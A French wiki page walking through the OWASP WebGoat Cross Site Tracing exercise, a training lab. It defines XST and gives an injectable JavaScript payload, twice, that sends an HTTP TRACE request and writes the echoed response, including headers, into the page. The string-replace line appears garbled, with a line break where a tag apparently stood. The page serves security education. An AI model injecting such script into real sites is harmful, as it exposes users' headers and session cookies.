OWASP WebGoat:Cross Site Tracing Attacks

From aldeid
Revision as of 16:55, 19 September 2010 by Admin (talk | contribs) (Remplacement du texte — « [[Catégorie: » par « [[Category: »)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Cross Site Tracing (XST) Attacks

Définition

Le Cross site tracing, abrégé XST, est une manière d'exploiter les failles de sécurité de type XSS, mettant à profit la méthode TRACE du protocole HTTP.

Exercice

Insérer le code suivant (sur une seule ligne) dans le champ "Enter your three digit access code" : 

<script type="text/javascript">
if ( navigator.appName.indexOf("Microsoft") !=-1)
{
  var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  xmlHttp.open("TRACE", "./", false);
  xmlHttp.send();
  str1 = xmlHttp.responseText;
  while (str1.indexOf("\n") > -1)
  {
    str1 = str1.replace("\n","
");
  }
  document.write(str1);
}
</script>

Ce qui donne (sur une seule ligne) : 

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","
"); document.write(str1);}</script>
Retrieved from "https://www.aldeid.com/w/index.php?title=OWASP_WebGoat:Cross_Site_Tracing_Attacks&oldid=8227"